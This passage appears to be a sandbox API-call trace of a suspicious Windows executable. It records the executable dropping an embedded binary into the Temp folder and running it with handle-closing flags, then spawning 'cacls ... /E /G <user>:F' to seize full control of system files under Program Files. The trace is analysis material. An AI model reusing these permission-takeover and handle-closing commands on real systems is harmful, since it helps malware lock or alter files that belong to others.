!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0248.471] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0248.471] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¶YgÞäþ\x18", lpUsedDefaultChar=0x0) returned 256 [0248.471] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x80) returned 0x539218 [0248.471] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0248.471] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0248.471] RtlSizeHeap (HeapHandle=0x520000, Flags=0x0, MemoryPointer=0x539218) returned 0x80 [0248.472] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0248.472] GetProcAddress (hModule=0x76d30000, lpProcName="IsWow64Process") returned 0x76d4195e [0248.472] GetCurrentProcess () returned 0xffffffff [0248.472] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18ff34 | out: Wow64Process=0x18ff34) returned 1 [0248.472] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fd28, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0248.472] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x18fb20, nSize=0x104 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x25 [0248.472] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0248.472] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0248.472] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0248.472] LockResource (hResData=0x43c648) returned 0x43c648 [0248.472] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x18) returned 0x5396e8 [0248.472] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x18f95c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x90 [0248.473] GetFileType (hFile=0x90) returned 0x1 [0248.474] WriteFile (in: hFile=0x90, lpBuffer=0x43c648*, nNumberOfBytesToWrite=0x37000, lpNumberOfBytesWritten=0x18df04, lpOverlapped=0x0 | out: lpBuffer=0x43c648*, lpNumberOfBytesWritten=0x18df04*=0x37000, lpOverlapped=0x0) returned 1 [0248.480] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1000) returned 0x539708 [0248.481] WriteFile (in: hFile=0x90, lpBuffer=0x539708*, nNumberOfBytesToWrite=0x490, lpNumberOfBytesWritten=0x18df00, lpOverlapped=0x0 | out: lpBuffer=0x539708*, lpNumberOfBytesWritten=0x18df00*=0x490, lpOverlapped=0x0) returned 1 [0248.481] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x539708 | out: hHeap=0x520000) returned 1 [0248.481] CloseHandle (hObject=0x90) returned 1 [0248.481] GetCommandLineW () returned="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner" [0248.481] CreateProcessW (in: lpApplicationName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe", lpCommandLine="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18facc*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18fb10 | out: lpCommandLine="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", lpProcessInformation=0x18fb10*(hProcess=0x94, hThread=0x90, dwProcessId=0x82c, dwThreadId=0xb4c)) returned 1 [0248.673] WaitForSingleObject (hHandle=0x94, dwMilliseconds=0xffffffff) Process: id = "278" image_name = "cacls.exe" filename = "c:\\windows\\syswow64\\cacls.exe" page_root = "0x13bf7000" os_pid = "0x3c4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "273" os_parent_pid = "0x6a0" cmd_line = "cacls \"C:\\Program Files\\Windows Journal\\en-US\\Journal.exe.mui\" /E /G 5p5NrGJn0jS HALPmcxz:F /C" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 899 os_tid = 0xb08 Process: id = "279" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x17e8a000" os_pid = "0xacc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "260" os_parent_pid = "0x1c4" cmd_line = "C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"MSPVWCTL.DLL.mui\" -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 900 os_tid = 0xa0c [0248.598] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fa74 | out: lpSystemTimeAsFileTime=0x16fa74*(dwLowDateTime=0x499a4860, dwHighDateTime=0x1d68287)) [0248.598] GetCurrentProcessId () returned 0xacc [0248.598] GetCurrentThreadId () returned 0xa0c [0248.598] GetTickCount () returned 0x1168c2a [0248.598] QueryPerformanceCounter (in: lpPerformanceCount=0x16fa6c | out: lpPerformanceCount=0x16fa6c*=36893744178) returned 1 [0248.600] GetModuleHandleA (lpModuleName=0x0) returned 0x49da0000 [0248.600] __set_app_type (_Type=0x1) [0248.600] __p__fmode () returned 0x770331f4 [0248.600] __p__commode () returned 0x770331fc [0248.600] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49dc21a6) returned 0x0 [0248.600] __getmainargs (in: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c, _DoWildCard=0, _StartInfo=0x49dc4140 | out: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c) returned 0 [0248.600] GetCurrentThreadId () returned 0xa0c [0248.601] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa0c) returned 0x60 [0248.601] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0248.601] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0248.601] SetThreadUILanguage (LangId=0x0) returned 0x409 [0248.601] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0248.601] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16fa04 | out: phkResult=0x16fa04*=0x0) returned 0x2 [0248.601] VirtualQuery (in: lpAddress=0x16fa3b, lpBuffer=0x16f9d4, dwLength=0x1c | out: lpBuffer=0x16f9d4*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0248.602] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16f9d4, dwLength=0x1c | out: lpBuffer=0x16f9d4*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0248.602] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16f9d4, dwLength=0x1c | out: lpBuffer=0x16f9d4*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0248.602] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16f9d4, dwLength=0x1c | out: lpBuffer=0x16f9d4*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0248.602] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16f9d4, dwLength=0x1c | out: lpBuffer=0x16f9d4*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0248.602] GetConsoleOutputCP () returned 0x1b5 [0248.602] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0248.602] SetConsoleCtrlHandler (HandlerRoutine=0x49dbe72a, Add=1) returned 1 [0248.602] _get_osfhandle (_FileHandle=1) returned 0x80 [0248.602] SetConsoleMode (hConsoleHandle=0x80, dwMode=0x0) returned 0 [0248.603] _get_osfhandle (_FileHandle=1) returned 0x80 [0248.603] GetConsoleMode (in: hConsoleHandle=0x80, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 0 [0248.603] _get_osfhandle (_FileHandle=0) returned 0x3 [0248.603] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0248.603] GetEnvironmentStringsW () returned 0x6a2200* [0248.603] GetProcessHeap () returned 0x690000 [0248.603] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xb88) returned 0x6a2d90 [0248.604] FreeEnvironmentStringsW (penv=0x6a2200) returned 1 [0248.604] GetProcessHeap () returned 0x690000 [0248.604] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x4) returned 0x6a18e0 [0248.604] GetEnvironmentStringsW () returned 0x6a2200* [0248.604] GetProcessHeap () returned 0x690000 [0248.604] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xb88) returned 0x6a3920 [0248.604] FreeEnvironmentStringsW (penv=0x6a2200) returned 1 [0248.604] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e974 | out: phkResult=0x16e974*=0x68) returned 0x0 [0248.604] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e97c, lpData=0x16e980, lpcbData=0x16e978*=0x1000 | out: lpType=0x16e97c*=0x0, lpData=0x16e980*=0x0, lpcbData=0x16e978*=0x1000) returned 0x2 [0248.605] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e97c, lpData=0x16e980, lpcbData=0x16e978*=0x1000 | out: lpType=0x16e97c*=0x4, lpData=0x16e980*=0x1, lpcbData=0x16e978*=0x4) returned 0x0 [0248.605] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e97c, lpData=0x16e980, lpcbData=0x16e978*=0x1000 | out: lpType=0x16e97c*=0x0, lpData=0x16e980*=0x1, lpcbData=0x16e978*=0x1000) returned 0x2 [0248.605] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e97c, lpData=0x16e980, lpcbData=0x16e978*=0x1000 | out: lpType=0x16e97c*=0x4, lpData=0x16e980*=0x0, lpcbData=0x16e978*=0x4) returned 0x0 [0248.605] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e97c, lpData=0x16e980, lpcbData=0x16e978*=0x1000 | out: lpType=0x16e97c*=0x4, lpData=0x16e980*=0x40, lpcbData=0x16e978*=0x4) returned 0x0 [0248.605] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e97c, lpData=0x16e980, lpcbData=0x16e978*=0x1000 | out: lpType=0x16e97c*=0x4, lpData=0x16e980*=0x40, lpcbData=0x16e978*=0x4) returned 0x0 [0248.605] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e97c, lpData=0x16e980, lpcbData=0x16e978*=0x1000 | out: lpType=0x16e97c*=0x0, lpData=0x16e980*=0x40, lpcbData=0x16e978*=0x1000) returned 0x2 [0248.605] RegCloseKey (hKey=0x68) returned 0x0 [0248.605] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e974 | out: phkResult=0x16e974*=0x68) returned 0x0 [0248.605] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e97c, lpData=0x16e980, lpcbData=0x16e978*=0x1000 | out: lpType=0x16e97c*=0x0, lpData=0x16e980*=0x40, lpcbData=0x16e978*=0x1000) returned 0x2 [0248.605] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e97c, lpData=0x16e980, lpcbData=0x16e978*=0x1000 | out: lpType=0x16e97c*=0x4, lpData=0x16e980*=0x1, lpcbData=0x16e978*=0x4) returned 0x0 [0248.605] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e97c, lpData=0x16e980, lpcbData=0x16e978*=0x1000 | out: lpType=0x16e97c*=0x0, lpData=0x16e980*=0x1, lpcbData=0x16e978*=0x1000) returned 0x2 [0248.605] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e97c, lpData=0x16e980, lpcbData=0x16e978*=0x1000 | out: lpType=0x16e97c*=0x4, lpData=0x16e980*=0x0, lpcbData=0x16e978*=0x4) returned 0x0 [0248.605] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e97c, lpData=0x16e980, lpcbData=0x16e978*=0x1000 | out: lpType=0x16e97c*=0x4, lpData=0x16e980*=0x9, lpcbData=0x16e978*=0x4) returned 0x0 [0248.606] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e97c, lpData=0x16e980, lpcbData=0x16e978*=0x1000 | out: lpType=0x16e97c*=0x4, lpData=0x16e980*=0x9, lpcbData=0x16e978*=0x4) returned 0x0 [0248.606] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e97c, lpData=0x16e980, lpcbData=0x16e978*=0x1000 | out: lpType=0x16e97c*=0x0, lpData=0x16e980*=0x9, lpcbData=0x16e978*=0x1000) returned 0x2 [0248.606] RegCloseKey (hKey=0x68) returned 0x0 [0248.606] time (in: timer=0x0 | out: timer=0x0) returned 0x5f51e30e [0248.606] srand (_Seed=0x5f51e30e) [0248.606] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"MSPVWCTL.DLL.mui\" -nobanner" [0248.606] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"MSPVWCTL.DLL.mui\" -nobanner" [0248.607] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0248.607] GetProcessHeap () returned 0x690000 [0248.607] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x210) returned 0x6a44b0 [0248.607] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x6a44b8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0248.608] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0248.608] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0248.608] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0248.608] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0248.608] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0248.608] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0248.608] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0248.608] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0248.608] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0248.608] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0248.608] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0248.608] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0248.608] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0248.608] GetProcessHeap () returned 0x690000 [0248.608] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x54) returned 0x6a46c8 [0248.608] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16f740 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0248.609] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x16f740, lpFilePart=0x16f73c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x16f73c*="Desktop") returned 0x25 [0248.609] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0248.609] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f4bc | out: lpFindFileData=0x16f4bc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4595f660, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x4595f660, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x6a2080 [0248.609] FindClose (in: hFindFile=0x6a2080 | out: hFindFile=0x6a2080) returned 1 [0248.609] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x16f4bc | out: lpFindFileData=0x16f4bc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x45665ae0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x45665ae0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x6a2080 [0248.609] FindClose (in: hFindFile=0x6a2080 | out: hFindFile=0x6a2080) returned 1 [0248.609] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0248.609] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x16f4bc | out: lpFindFileData=0x16f4bc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x6a2080 [0248.609] FindClose (in: hFindFile=0x6a2080 | out: hFindFile=0x6a2080) returned 1 [0248.610] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0248.610] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0248.610] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0248.610] GetProcessHeap () returned 0x690000 [0248.610] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2d90 | out: hHeap=0x690000) returned 1 [0248.610] GetEnvironmentStringsW () returned 0x6a2200* [0248.610] GetProcessHeap () returned 0x690000 [0248.610] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xb88) returned 0x6a2d90 [0248.610] FreeEnvironmentStringsW (penv=0x6a2200) returned 1 [0248.610] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0248.610] GetProcessHeap () returned 0x690000 [0248.610] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a46c8 | out: hHeap=0x690000) returned 1 [0248.610] GetProcessHeap () returned 0x690000 [0248.610] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x400e) returned 0x6a4f28 [0248.611] 